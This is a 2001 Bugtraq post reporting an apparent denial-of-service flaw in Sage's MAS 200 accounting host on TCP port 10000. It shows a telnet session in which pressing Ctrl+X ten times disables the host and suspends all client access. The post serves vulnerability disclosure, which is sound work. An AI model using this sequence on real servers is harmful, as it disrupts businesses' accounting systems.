[22367] in bugtraq
Bug in MAS90 Accounting Platform remote access?
daemon@ATHENA.MIT.EDU (Administrator)
Tue Aug 21 20:09:05 2001
Date: Tue, 21 Aug 2001 16:35:56 -0700
Message-ID: <BCC8282A57137A43BE52AB905B7DBAE20182CE@sbs.jfdi.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
From: "Administrator" <Administrator@jfdi.com>
content-class: urn:content-classes:message
To: <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit
Greetings,
Not sure if any previous issues with this application have surfaced
here, but I've run
Sage Software's MAS 200 is an accounting platform which can be
configured to permit remote access to server-side data over TCP/IP. A
host application listens for connections on the server, and all remote
clients use a workstation app to interface with the host.
Running a port scanner determined that the MAS 200 host application
listens for connections on port 10000.....
telnet x.x.x.x port: 10000
Connected...
<enter>
"The host does not support this application"
<control + x> X 10 <enter>
"The host has been disabled"...
exit
telnet x.x.x.x port: 10000
Connected...
<enter>
"The host has been disabled"...
--------------------------------------------------------------
Checking the status of the host app at the server console revealed it
had indeed been switched to 'Disabled' status, and all access to the
server from clients on the LAN and WAN sides thru the client application
had been suspended. Am i missing something here? Or is it way too easy
DOS this software?
